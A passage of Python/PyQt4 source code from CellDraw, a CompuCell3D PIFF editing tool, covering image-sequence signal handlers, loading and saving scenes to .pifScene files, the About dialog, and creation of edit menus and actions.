self.windowPIFControlPanel.setImageSequenceWidthLabel(lDict[0])\n self.windowPIFControlPanel.setImageSequenceHeightLabel(lDict[1])\n self.windowPIFControlPanel.setImageSequenceDepthLabel(lDict[2])\n self.windowPIFControlPanel.setImageSequenceImageUnitsLabel(lDict[3])\n\n\n\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: moving to a MVC design, TODO:\n # this connect signal handler should go to the Controller object!\n #\n # handleImageSequenceIndexSet() responds to signalThatCurrentIndexSet changes\n # ------------------------------------------------------------\n def handleImageSequenceIndexSet(self, pDict):\n lDict = dict(pDict)\n self.windowPIFControlPanel.setImageSequenceCurrentIndex(lDict[0])\n self.windowPIFControlPanel.setImageSequenceCurrentFilename(lDict[1])\n\n\n\n\n # ------------------------------------------------------------------\n # 2011 Mitja - slot method handling \"signalSelectedImageInSequenceHasChanged\" events\n # (AKA signals) arriving from the object theControlsForImageSequence\n # ------------------------------------------------------------------\n def handleSelectedImageWithinSequenceChanged(self, pSelectedImage):\n\n if isinstance(self.scene.theImageSequence, CDImageSequence) == True:\n self.scene.theImageSequence.setCurrentIndexInSequence( pSelectedImage )\n\n self.scene.update()\n\n CDConstants.printOut( \" handleSelectedImageWithinSequenceChanged() - self.scene.theImageSequence.getCurrentIndex() = \"+str(self.scene.theImageSequence.getCurrentIndex()) , CDConstants.DebugExcessive )\n\n\n # ------------------------------------------------------------------\n # 2011 Mitja - slot method handling \"signalImageSequenceProcessingModeHasChanged\" events\n # (AKA signals) arriving from the object theControlsForImageSequence\n # ------------------------------------------------------------------\n def handleAreaOrEdgeModeHasChanged(self, pMode):\n \n CDConstants.printOut( \" handleAreaOrEdgeModeHasChanged() str(type(pMode))==[\"+str(type(pMode))+\"]\" , CDConstants.DebugTODO )\n CDConstants.printOut( \" str(type(pMode).__name__)==[\"+str(type(pMode).__name__)+\"]\" , CDConstants.DebugTODO )\n CDConstants.printOut( \" str(pMode)==[\"+str(pMode)+\"]\" , CDConstants.DebugTODO )\n # bin() does not exist in Python 2.5:\n if ((sys.version_info[0] >= 2) and (sys.version_info[1] >= 6)) :\n CDConstants.printOut( \" str(bin(int(pMode)))==[\"+str(bin(int(pMode)))+\"]\" , CDConstants.DebugTODO )\n else:\n CDConstants.printOut( \" str(int(pMode))==[\"+str(int(pMode))+\"]\" , CDConstants.DebugTODO )\n\n if ( isinstance(self.scene.theImageSequence, CDImageSequence) == True ):\n # go and tell the image sequence in what mode it is now:\n self.scene.theImageSequence.assignAllProcessingModesForImageSequenceToPIFF( pMode )\n self.scene.update()\n\n# \n# TODO:\n# \n# Traceback (most recent call last):\n# File \"/Volumes/30G/Users/mitja/Desktop/CellDraw/CellDraw/1.5.1/src/cdDiagramScene.py\", line 3026, in handleAreaOrEdgeModeHasChanged\n# CDConstants.printOut( \" handleAreaOrEdgeModeHasChanged - self.scene.theImageSequence.assignAllProcessingModesForImageSequenceToPIFF( \"+str(bin(pMode))+\") \" , CDConstants.DebugExcessive )\n# TypeError: bin(QTextStream): argument 1 has unexpected type 'int'\n# \n# \n\n # bin() does not exist in Python 2.5:\n if ((sys.version_info[0] >= 2) and (sys.version_info[1] >= 6)) :\n CDConstants.printOut( \" handleAreaOrEdgeModeHasChanged() called self.scene.theImageSequence.assignAllProcessingModesForImageSequenceToPIFF( \"+str(bin(pMode))+\") complete.\" , CDConstants.DebugExcessive )\n else:\n CDConstants.printOut( \" handleAreaOrEdgeModeHasChanged() called self.scene.theImageSequence.assignAllProcessingModesForImageSequenceToPIFF( \"+str(pMode)+\") complete.\" , CDConstants.DebugExcessive )\n\n\n\n\n\n\n\n\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: add code for loading an entire scene from a saved .pifScene file:\n # ( file handling in PyQt inspired by:\n # \"mi_pyqt/examples/mainwindows/application/application.py\" )\n # ------------------------------------------------------------\n\n\n # ------------------------------------------------------------\n def newSceneFile(self):\n# lUserChoice = QtGui.QMessageBox.warning(self, \"CellDraw\",\n# \"Do you want to delete your current Cell Scene, Types, and Regions?\",\n# QtGui.QMessageBox.Save | QtGui.QMessageBox.Discard |\n# QtGui.QMessageBox.Cancel)\n lNewSceneMessageBox = QtGui.QMessageBox(self)\n lNewSceneMessageBox.setWindowModality(QtCore.Qt.WindowModal)\n lNewSceneMessageBox.setIcon(QtGui.QMessageBox.Warning)\n # the \"setText\" sets the main large CDConstants.printOut( \" \"+str( text in the dialog box: )+\" \", CDConstants.DebugTODO )\n lNewSceneMessageBox.setText(\"The current Cell Scene, Types and Regions will be discarded.\")\n # the \"setInformativeText\" sets a smaller CDConstants.printOut( \" \"+str( text, below the main large print text in the dialog box: )+\" \", CDConstants.DebugTODO )\n lNewSceneMessageBox.setInformativeText(\"Do you want to save your changes?\")\n lNewSceneMessageBox.setStandardButtons(QtGui.QMessageBox.Save | QtGui.QMessageBox.Discard |\n QtGui.QMessageBox.Cancel)\n lNewSceneMessageBox.setDefaultButton(QtGui.QMessageBox.Cancel)\n lUserChoice = lNewSceneMessageBox.exec_()\n\n if lUserChoice == QtGui.QMessageBox.Save:\n QtGui.QMessageBox.warning(self, \"CellDraw\", \\\n \"Automatic cc3s SAVE yet to be implemented...\\n\" + \\\n \"Please save manually, then try New Scene again.\")\n return False\n elif lUserChoice == QtGui.QMessageBox.Cancel:\n # if the user hits \"esc\" or presses the \"Cancel\" button,\n # there's nothing to be done:\n return False\n elif lUserChoice == QtGui.QMessageBox.Discard:\n # ------------------------------------------------------------\n # bring up the New Scene assistant AKA wizard\n lAssistant = CDSceneAssistant()\n \n # read some persistent-value globals from the preferences file on disk, if it already exists.\n self.cdPreferences.readPreferencesFromDisk()\n self.cdPreferences.readCC3DPreferencesFromDisk()\n lTheColorTable = self.cdPreferences.populateCellColors()\n lTheColorDict = self.cdPreferences.getCellColorsDict()\n \n lAssistant.setPreferencesObject(self.cdPreferences)\n \n lAssistant.addPage(lAssistant.createIntroPage(lTheColorTable))\n lAssistant.addPage(lAssistant.createCellTypePage(lTheColorDict))\n lAssistant.addPage(lAssistant.createRegionTypePage())\n \n lAssistant.show()\n lAssistant.raise_()\n lAssistant.exec_()\n \n # ------------------------------------------------------------\n \n else:\n lCriticalErrorWarning = QtGui.QMessageBox.critical( self, \\\n \"CellDraw\", \\\n \"Critical eror -4554073\\n\\n.\" + \\\n \"Please contact your system administrator or the source where you obtained CellDraw.\" )\n sys.exit()\n\n CDConstants.printOut( \"___ - DEBUG ----- CDDiagramSceneMainWidget: newSceneFile(): done.\", CDConstants.DebugExcessive )\n #\n # end of def newSceneFile(self)\n # ------------------------------------------------------------\n\n\n\n # ------------------------------------------------------------\n def openSceneFile(self, pFileName):\n # TODO: for smoother user feedback, implement a \"modified\" bit\n # to only allow saving when a scene actually contains unsaved content.\n # self.scene.setModified(False)\n# if self.maybeSave():\n# fileName = QtGui.QFileDialog.getOpenFileName(self)\n# if fileName:\n# self.loadScenePIFDataFromFile(fileName)\n self.loadScenePIFDataFromFile(pFileName)\n\n # ------------------------------------------------------------\n def loadScenePIFDataFromFile(self, pFileName):\n CDConstants.printOut( \"2011 DEBUG: loadScenePIFDataFromFile(\"+str(pFileName)+\") starting.\", CDConstants.DebugExcessive )\n lQFileForReading = QtCore.QFile(pFileName)\n if not lQFileForReading.open(QtCore.QFile.ReadOnly):\n QtGui.QMessageBox.warning(self, \"CellDraw\",\n \"Cannot read file:\\n%s\\n%s.\" % (pFileName, lQFileForReading.errorString()))\n return False\n\n lDataStream = QtCore.QDataStream(lQFileForReading)\n\n\n lHowManyItems = lDataStream.readQVariant().toInt()[0]\n\n for i in xrange(lHowManyItems) :\n\n # read from the datastream:\n lSelectedItemPosition = lDataStream.readQVariant().toPointF()\n lSelectedItemColor = QtGui.QColor(lDataStream.readQVariant()) \n # a bit counterintuitively, the toInt() and toFloat() functions DON'T return\n # ints or floats... they return couples of values. So we grab the first ones:\n lSelectedItemRegionOrCell = lDataStream.readQVariant().toInt()[0]\n lSelectedItemType = lDataStream.readQVariant().toInt()[0]\n lSelectedItemScaleX = lDataStream.readQVariant().toFloat()[0]\n lSelectedItemScaleY = lDataStream.readQVariant().toFloat()[0]\n lSelectedItemZValue = lDataStream.readQVariant().toFloat()[0]\n \n lListOfPointsX = lDataStream.readQVariant().toList()\n lListOfPointsY = lDataStream.readQVariant().toList()\n# CDConstants.printOut( \" \"+str( \"LOAD: lListOfPointsX =\", lListOfPointsX )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \"LOAD: lListOfPointsY =\", lListOfPointsY )+\" \", CDConstants.DebugTODO )\n lLengthX = len(lListOfPointsX)\n lLengthY = len(lListOfPointsY)\n if lLengthX == lLengthY:\n pass\n else:\n CDConstants.printOut(\"LOAD: received INCONSISTENT paste data! Can't paste.\", CDConstants.DebugTODO )\n return\n\n\n lSelectedItemPolygon = QtGui.QPolygonF()\n # CDConstants.printOut( \" \"+str( \"LOAD: lSelectedItemPolygon =\", lSelectedItemPolygon )+\" \", CDConstants.DebugTODO )\n\n\n for i in xrange(lLengthX):\n # CDConstants.printOut( \" \"+str( \"LOAD: lListOfPointsX[i].toFloat() = \", lListOfPointsX[i].toFloat() )+\" \", CDConstants.DebugTODO )\n # CDConstants.printOut( \" \"+str( \"LOAD: lListOfPointsY[i].toFloat() = \", lListOfPointsX[i].toFloat() )+\" \", CDConstants.DebugTODO )\n lPointF = QtCore.QPointF(lListOfPointsX[i].toFloat()[0], lListOfPointsY[i].toFloat()[0])\n # CDConstants.printOut( \" \"+str( \"LOAD: lPointF =\", lPointF )+\" \", CDConstants.DebugTODO )\n lSelectedItemPolygon.append(lPointF)\n\n\n# CDConstants.printOut( \" \"+str( \"LOAD: lSelectedItemPosition =\", lSelectedItemPosition )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \"LOAD: lSelectedItemColor =\", lSelectedItemColor )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \"LOAD: lSelectedItemRegionOrCell =\", lSelectedItemRegionOrCell )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \"LOAD: lSelectedItemType =\", lSelectedItemType )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \"LOAD: lSelectedItemScaleX =\", lSelectedItemScaleX )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \"LOAD: lSelectedItemScaleY =\", lSelectedItemScaleY )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \"LOAD: lSelectedItemZValue =\", lSelectedItemZValue )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \"LOAD: lSelectedItemPolygon =\", lSelectedItemPolygon )+\" \", CDConstants.DebugTODO )\n\n # convert the polygon we've constructed from pasted QPointF values\n # into a QPainterPath which can be digested by the DiagramItem constructor:\n lPath = QtGui.QPainterPath()\n lPath.addPolygon(lSelectedItemPolygon)\n lTheNewItem = DiagramItem(lPath, self.scene.myItemMenu)\n # set the new item's color i.e. brush value:\n lTheNewItem.setBrush(lSelectedItemColor)\n\n # 2011 - Mitja: the new item is a region of cells or a single cell:\n lTheNewItem.setRegionOrCell(lSelectedItemRegionOrCell)\n\n # finally, place the newly built item, i.e. \"paste\" it into the Cell Scene:\n self.scene.addItem(lTheNewItem)\n\n # to provide the default behavior of having the new item selected,\n # first unselect all selected items in the scene:\n for anItem in self.scene.selectedItems():\n anItem.setSelected(False)\n # then select the newly created item:\n lTheNewItem.setSelected(True)\n\n # emit our own signal to the handler which does other GUI adjustments\n # whenever a new signal is inserted:\n self.scene.signalThatItemInserted.emit(lTheNewItem)\n\n # position the new item in the scene:\n lTheNewItem.setPos(lSelectedItemPosition)\n lTheNewItem.setZValue(lSelectedItemZValue)\n \n # set the same size transformation to the pasted item as it had from the copied/cut one:\n lTheNewItem.myScaleX = lSelectedItemScaleX\n lTheNewItem.myScaleY = lSelectedItemScaleY\n # using QTransform, we first create a transformation, then we apply it to the item:\n lTransform = QtGui.QTransform()\n lTransform.scale( lTheNewItem.myScaleX, lTheNewItem.myScaleY )\n lTheNewItem.setTransform( lTransform )\n \n # 2011 - Mitja: after setting the pasted item's color (AKA brush)\n # also update the scene's regionUseDict since it contains the list of all\n # region colors in use by our scene:\n self.scene.addToRegionColorsInUse(lSelectedItemColor)\n\n\n lQFileForReading.close()\n self.setCurrentFile(pFileName)\n self.parentWindow.setStatusTip(\"Cell Scene read from file %s\" % pFileName)\n return True\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: add code for saving an entire scene to a .pifScene file:\n # ( file handling in PyQt inspired by:\n # \"mi_pyqt/examples/mainwindows/application/application.py\" )\n # ------------------------------------------------------------\n\n # TODO: for smoother user feedback, implement a \"modified\" bit\n # to only allow saving when a scene actually contains unsaved content.\n # self.scene.setModified(False)\n# def maybeSave(self):\n# if self.textEdit.document().isModified():\n# ret = QtGui.QMessageBox.warning(self, \"CellDraw\",\n# \"Do you want to save your current Scene?\",\n# QtGui.QMessageBox.Save | QtGui.QMessageBox.Discard |\n# QtGui.QMessageBox.Cancel)\n# if ret == QtGui.QMessageBox.Save:\n# return self.save()\n# elif ret == QtGui.QMessageBox.Cancel:\n# return False\n# return True\n\n # ------------------------------------------------------------\n def setCurrentFile(self, pFileName):\n self.curFile = pFileName\n # TODO: for smoother user feedback, implement a \"modified\" bit\n # to only allow saving when a scene actually contains unsaved content.\n # self.scene.setModified(False)\n self.setWindowModified(False)\n\n if self.curFile:\n shownName = self.strippedName(self.curFile)\n else:\n shownName = 'untitled.pifScene'\n\n self.setWindowTitle(\"%s[*] - CellDraw\" % shownName)\n\n def strippedName(self, fullFileName):\n return QtCore.QFileInfo(fullFileName).fileName()\n\n # ------------------------------------------------------------\n def saveSceneFile(self):\n if self.curFile:\n lFileSaved = self.saveScenePIFDataToFile(self.curFile)\n else:\n lFileSaved = self.saveAs()\n return lFileSaved\n\n # ------------------------------------------------------------\n def saveAs(self):\n\n # 2011 - Mitja: setup local variables for file saving:\n lToBeSavedFileExtension = QtCore.QString(\"pifScene\")\n lToBeSavedInitialPath = QtCore.QDir.currentPath() + self.tr(\"/untitled.\") + lToBeSavedFileExtension\n\n lFileName = QtGui.QFileDialog.getSaveFileName(self, self.tr(\"CellDraw - Save Scene As\"),\n lToBeSavedInitialPath,\n self.tr(\"%1 files (*.%2);;All files (*)\")\n .arg(lToBeSavedFileExtension)\n .arg(lToBeSavedFileExtension))\n\n if lFileName:\n lFileSaved = self.saveScenePIFDataToFile(lFileName)\n else:\n lFileSaved = False\n return lFileSaved\n\n # ------------------------------------------------------------\n def saveScenePIFDataToFile(self, pFileName):\n lAllItems = self.scene.items()\n lHowManyItems = len(lAllItems)\n\n CDConstants.printOut( str(lHowManyItems) + \", \" + str(lAllItems) + \" \", CDConstants.DebugTODO )\n\n # make sure that there is at least one item in the scene:\n if not lAllItems:\n CDConstants.printOut(\"#=#=#=#=#=#=#=# saveScenePIFDataToFile() lAllItems =\", lAllItems , CDConstants.DebugTODO )\n print\n CDConstants.printOut(\"there is NOTHING in your Cell Scene!!!\", CDConstants.DebugTODO )\n print\n return\n\n\n lQFileForWriting = QtCore.QFile(pFileName)\n if not lQFileForWriting.open(QtCore.QFile.WriteOnly):\n QtGui.QMessageBox.warning(self, \"CellDraw\",\n \"Cannot write file %s.\\nError: %s.\" % (pFileName, lQFileForWriting.errorString()))\n return False\n\n # if we wrote into memory first, we'd create an empty byte array:\n # lItemDataByteArray = QByteArray()\n\n # open a data stream that can write *not* to the new byte array,\n # but to the file we just opened:\n # lDataStream = QtCore.QDataStream(lItemDataByteArray, QtCore.QIODevice.WriteOnly)\n lDataStream = QtCore.QDataStream(lQFileForWriting)\n \n # first, write how many items we have,\n # for easier loading when reopening the file:\n lDataStream.writeQVariant(lHowManyItems)\n\n # extract all the necessary data for *each* scene item individually:\n for lAnItem in lAllItems:\n # get all the necessary information from the item:\n lSelectedItemPosition = lAnItem.scenePos()\n lSelectedItemColor = lAnItem.brush().color()\n lSelectedItemRegionOrCell = lAnItem.itsaRegionOrCell\n lSelectedItemType = lAnItem.diagramType\n lSelectedItemScaleX = lAnItem.myScaleX\n lSelectedItemScaleY = lAnItem.myScaleY\n lSelectedItemZValue = lAnItem.zValue()\n lSelectedItemPolygon = lAnItem.polygon()\n lPointListX = [] \n lPointListY = [] \n for lPointF in lSelectedItemPolygon:\n lPointListX.append(lPointF.x())\n lPointListY.append(lPointF.y())\n\n # write into the QDataStream just opened above:\n # the order in which data is written is important!!!\n lDataStream.writeQVariant(lSelectedItemPosition)\n lDataStream.writeQVariant(lSelectedItemColor)\n lDataStream.writeQVariant(lSelectedItemRegionOrCell)\n lDataStream.writeQVariant(lSelectedItemType)\n lDataStream.writeQVariant(lSelectedItemScaleX)\n lDataStream.writeQVariant(lSelectedItemScaleY)\n lDataStream.writeQVariant(lSelectedItemZValue)\n lDataStream.writeQVariant(lPointListX)\n lDataStream.writeQVariant(lPointListY)\n\n # we could place the byte array into a mime data container?\n # lMimeData = QtCore.QMimeData()\n # lMimeData.setData('application/x-pif-scene', lItemDataByteArray)\n\n lQFileForWriting.close()\n self.setCurrentFile(pFileName)\n self.parentWindow.setStatusTip(\"Cell Scene written to file %s\" % pFileName)\n return True\n\n\n # ------------------------------------------------------------\n def about(self):\n \n lAboutString = \"CellDraw 1.5.1

An editing and conversion software tool for PIFF files, as used in CompuCell3D simulations.

CellDraw can be useful for creating PIFF files containing a high number of cells and cell types, either by drawing a scene containing cell regions in a paint program, and then discretize the drawing into a PIFF file, or by drawing the cell scenario directly in CellDraw.

More information at:
http://www.compucell3d.org/\"\n\n lVersionString = \"

Support library information:
Python runtime version: %s
Qt runtime version: %s
Qt compile-time version: %s
PyQt version: %s (%s = 0x%06x)
\" % \\\n ( str(sys.version_info[0])+\".\"+str(sys.version_info[1])+\".\"+str(sys.version_info[2])+\" | \"+str(sys.version_info[3])+\" | \"+str(sys.version_info[4]) , \\\n QtCore.QT_VERSION_STR, QtCore.qVersion(), PyQt4.QtCore.PYQT_VERSION_STR, PyQt4.QtCore.PYQT_VERSION, PyQt4.QtCore.PYQT_VERSION)\n\n QtGui.QMessageBox.about(self, \"About CellDraw\", lAboutString+lVersionString)\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: connectSignals() contains all signal<->handler(AKA slot)\n # connections for the CDDiagramSceneMainWidget class:\n # ------------------------------------------------------------\n def connectSignals(self):\n\n # connect signals in other objects to this class' methods:\n self.scene.signalThatItemInserted.connect(self.handlerForItemInserted)\n self.scene.signalThatTextInserted.connect(self.handlerForTextInserted)\n self.scene.signalThatItemSelected.connect(self.handlerForItemSelected)\n\n self.scene.signalThatItemResized.connect(self.handlerForItemResized)\n\n self.scene.signalThatSceneResized.connect(self.handlerForSceneResized)\n\n\n self.scene.theImageLayer.signalThatMouseMoved.connect(self.handlerForMouseMoved)\n\n\n # signal<->handler(AKA slot) connections, connect signals to this class' methods:\n self.theCDImageSequence.signalThatImageSequenceResized.connect( \\\n self.handleImageSequenceResized )\n\n # signal<->handler(AKA slot) connections, connect signals to this class' methods:\n self.theCDImageSequence.signalThatCurrentIndexSet.connect( \\\n self.handleImageSequenceIndexSet )\n\n\n\n # 2011 - Mitja: connect the sender (i.e. self.theCDImageLayer) object's signal\n # (i.e. \"mousePressedInImageLayerSignal()\" in CDImageLayer's mousePressEvent() ),\n # to the receiver fuction (i.e. handleMousePressedInImageLayerSignal() here.) :\n self.connect( self.theCDImageLayer, \\\n QtCore.SIGNAL(\"mousePressedInImageLayerSignal()\"), \\\n self.handleMousePressedInImageLayerSignal )\n\n # you can use this syntax instead of the 'old' one:\n self.mysignal.connect(self.myslot)\n\n # but this will also work\n self.connect(self, QtCore.SIGNAL('mysignal(QString)'), self.myslot)\n\n self.mysignal.emit(\"hello\")\n\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: myslot is a test handler (AKA slot) for signals:\n # ------------------------------------------------------------\n def myslot(self, param):\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n\n\n\n\n\n # ------------------------------------------------------------\n\n\n # ------------------------------------------------------------\n def createButtonGroupForRegionShapes(self):\n lButtonGroup = QtGui.QButtonGroup()\n lButtonGroup.setExclusive(False)\n lButtonGroup.buttonClicked[int].connect(self.handlerForButtonGroupRegionShapesClicked)\n return lButtonGroup\n\n\n # ------------------------------------------------------------\n def createButtonGroupForBackgrounds(self):\n lButtonGroup = QtGui.QButtonGroup()\n lButtonGroup.buttonClicked.connect(self.handlerForButtonGroupBackgroundsClicked)\n return lButtonGroup\n\n\n\n\n\n\n\n\n\n # ------------------------------------------------------------\n def createSceneEditActions(self):\n\n # Note: PyQt 4.8.6 seems to have problems with assigning the proper key shortcuts\n # using mnemonics such as:\n # shortcut=QtGui.QKeySequence.Cut\n # shortcut=QtGui.QKeySequence.Copy\n # shortcut=QtGui.QKeySequence.Paste\n # so we have to set the shortcuts explicitly to \"Ctrl+key\" ...\n \n self.cutAction = QtGui.QAction(\n QtGui.QIcon(':/icons/cutRegion.png'), \"Cut\", self,\n shortcut=\"Ctrl+X\", statusTip=\"Cut a region from the Cell Scene\",\n triggered=self.cutItem)\n\n self.copyAction = QtGui.QAction(\n QtGui.QIcon(':/icons/copyRegion.png'), \"Copy\", self,\n shortcut=\"Ctrl+C\", statusTip=\"Copy a region from the Cell Scene\",\n triggered=self.copyItem)\n\n self.pasteAction = QtGui.QAction(\n QtGui.QIcon(':/icons/pasteRegion.png'), \"Paste\", self,\n shortcut=\"Ctrl+V\", statusTip=\"Paste a region to the Cell Scene\",\n triggered=self.pasteItem)\n\n # Another cross-platform Qt messy implementation: according to Qt documentation,\n # the \"Delete\" shortcut maps to the \"Del\" button on Mac OS X.\n # But on Mac OS X there is NO \"Del\" button: there are the \"Delete\" button\n # and the \"forward delete\" button. To obtain correct behavior, we therefore have\n # to use the \"Backspace\" Qt shortcut, which maps to the \"Delete\" button on Mac OS X.\n # Qt continuously exhibits poorly implemented cross-platform functionalities.\n if sys.platform=='darwin':\n self.deleteAction = QtGui.QAction(QtGui.QIcon(':/icons/deleteRegion.png'),\n \"&Delete\", self, shortcut=\"Backspace\",\n statusTip=\"Delete a region from the Cell Scene\",\n triggered=self.deleteItem)\n else:\n self.deleteAction = QtGui.QAction(QtGui.QIcon(':/icons/deleteRegion.png'),\n \"&Delete\", self, shortcut=\"Delete\",\n statusTip=\"Delete a region from the Cell Scene\",\n triggered=self.deleteItem)\n\n self.toFrontAction = QtGui.QAction(\n QtGui.QIcon(':/icons/bringtofront.png'), \"Bring to &Front\",\n self, shortcut=\"Ctrl+F\", statusTip=\"Bring a region to the front of the Cell Scene\",\n triggered=self.bringToFront)\n\n self.sendBackAction = QtGui.QAction(\n QtGui.QIcon(':/icons/sendtoback.png'), \"Send to &Back\", self,\n shortcut=\"Ctrl+B\", statusTip=\"Send a region to the back of the Cell Scene\",\n triggered=self.sendToBack)\n\n\n # 2010 - Mitja: one more cross-platform Qt messup:\n # since when is Ctrl-X a standard cross-platform shortcut for quitting an application???\n # 2010 - Mitja: GUI simplification: hide all that's not necessary to Cell Scene editing:\n # in this case don't create the exitAction, it's redundant:\n # self.exitAction = QtGui.QAction(\"E&xit\", self, shortcut=\"Ctrl+X\",\n # statusTip=\"Quit Scenediagram example\", triggered=self.close)\n\n self.boldAction = QtGui.QAction(QtGui.QIcon(':/icons/bold.png'),\n \"Bold\", self, checkable=True, shortcut=\"Ctrl+B\",\n triggered=self.handleFontChange)\n\n self.italicAction = QtGui.QAction(QtGui.QIcon(':/icons/italic.png'),\n \"Italic\", self, checkable=True, shortcut=\"Ctrl+I\",\n triggered=self.handleFontChange)\n\n self.underlineAction = QtGui.QAction(\n QtGui.QIcon(':/icons/underline.png'), \"Underline\", self,\n checkable=True, shortcut=\"Ctrl+U\",\n triggered=self.handleFontChange)\n\n self.aboutAction = QtGui.QAction(\"About\", self, \\\n shortcut=\"Ctrl+E\", \\\n triggered=self.about)\n\n CDConstants.printOut(\"___ - DEBUG ----- CDDiagramSceneMainWidget: createSceneEditActions() done.\", CDConstants.DebugTODO )\n\n # end of def createSceneEditActions(self)\n # ------------------------------------------------------------\n \n \n\n # ------------------------------------------------------------\n # 2010 - Mitja: is there any real need for menus,\n # when all actions are reachable from toolbars?\n # ------------------------------------------------------------\n def createMenus(self):\n # 2010 - Mitja: GUI simplification: hide all that's not necessary to Cell Scene editing:\n # in this case don't add the fileMenu to the main menubar, it's redundant:\n # self.fileMenu = self.parentWindow.menuBar().addMenu(\"&File\")\n # self.fileMenu.addAction(self.exitAction)\n CDConstants.printOut(str( self.parentWindow ), CDConstants.DebugTODO )\n self.editMenu = self.parentWindow.menuBar().addMenu(\"Edit\")\n self.editMenu.addAction(self.cutAction)\n self.editMenu.addAction(self.copyAction)\n self.editMenu.addAction(self.pasteAction)\n self.editMenu.addAction(self.deleteAction)\n self.editMenu.addSeparator()\n self.editMenu.addAction(self.toFrontAction)\n self.editMenu.addAction(self.sendBackAction)\n\n self.windowMenu = self.parentWindow.menuBar().addMenu(\"Window\")\n\n self.aboutMenu = self.parentWindow.menuBar().addMenu(\"Help\")\n self.aboutMenu.addAction(self.aboutAction)\n\n # ------------------------------------------------------------\n# def createToolbars(self):\n\n # 2010 - Mitja: dummy \"Toolbar\" toolbar, it contains nothing, but\n # it seems to be necessary to bypass a Qt bug which prevents the first toolbar\n # added to a parent window from showing up there.\n #\n # self.dummyToolBar = self.parentWindow.addToolBar(\"Toolbar\")\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja: \"Color\" toolbar, it's built from 3 pop-up menu buttons,\n # one each for font color, item fill color, and line color.\n # Menu defaults are set here and for consistency they *must* coincide\n # with the defaults set in the DiagramScene class globals:\n # But really only use the item fill color, and we disable the other two:\n #\n #\n# self.fontColorToolButton = QtGui.QToolButton()\n# self.fontColorToolButton.setPopupMode(QtGui.QToolButton.MenuButtonPopup)\n# self.fontColorToolButton.setMenu(\n# self.createColorMenu(self.textColorChanged, QtCore.Qt.red))\n# self.textAction = self.fontColorToolButton.menu().defaultAction()\n# self.fontColorToolButton.setIcon(\n# self.createColorToolButtonIcon(':/icons/textpointer.png',\n# QtCore.Qt.red))\n# self.fontColorToolButton.setAutoFillBackground(True)\n# self.fontColorToolButton.clicked.connect(self.textButtonTriggered)\n# #\n# self.lineColorToolButton = QtGui.QToolButton()\n# self.lineColorToolButton.setPopupMode(QtGui.QToolButton.MenuButtonPopup)\n# self.lineColorToolButton.setMenu(\n# self.createColorMenu(self.lineColorChanged, QtCore.Qt.black))\n# self.lineAction = self.lineColorToolButton.menu().defaultAction()\n# self.lineColorToolButton.setIcon(\n# self.createColorToolButtonIcon(':/icons/linecolor.png',\n# QtCore.Qt.black))\n# self.lineColorToolButton.clicked.connect(self.lineButtonTriggered)\n\n# self.colorToolBar = self.parentWindow.addToolBar(\"Color\")\n # 2010 - Mitja: GUI simplification: hide all that's not necessary to Cell Scene editing:\n # in this case don't add to the colorToolbar the fontColorToolButton and lineColorToolButton button-popup-menus:\n # self.colorToolBar.addWidget(self.fontColorToolButton)\n # self.colorToolBar.addWidget(self.lineColorToolButton)\n # self.colorToolBar.addWidget(self.fillColorToolButton)\n# self.colorToolBar.addAction(self.pifTableAction)\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja: \"Font\" toolbar:\n # (we don't currently use this toolbar in the Cell Scene editor)\n # \n# self.fontCombo = QtGui.QFontComboBox()\n# self.fontCombo.currentFontChanged.connect(self.currentFontChanged)\n# #\n# self.fontSizeCombo = QtGui.QComboBox()\n# self.fontSizeCombo.setEditable(True)\n# for i in range(8, 30, 2):\n# self.fontSizeCombo.addItem(str(i))\n# validator = QtGui.QIntValidator(2, 64, self)\n# self.fontSizeCombo.setValidator(validator)\n# self.fontSizeCombo.currentIndexChanged.connect(self.fontSizeChanged)\n #\n # 2010 - Mitja: GUI simplification: hide all that's not necessary to Cell Scene editing:\n # in this case don't add to the parentWindow the textToolBar for handling text fonts:\n # self.textToolBar = self.parentWindow.addToolBar(\"Font\")\n # just create the QToolBar and hide it, in case not having it would bring havoc to the application!\n# self.textToolBar = QtGui.QToolBar(\"Font\")\n# self.textToolBar.addWidget(self.fontCombo)\n# self.textToolBar.addWidget(self.fontSizeCombo)\n# self.textToolBar.addAction(self.boldAction)\n# self.textToolBar.addAction(self.italicAction)\n# self.textToolBar.addAction(self.underlineAction)\n# self.textToolBar.hide()\n\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja: add code for new backgrounds:\n # ------------------------------------------------------------\n def updateBackgroundImage(self, pText, pImage):\n # update globals in the cdDiagramScene:\n 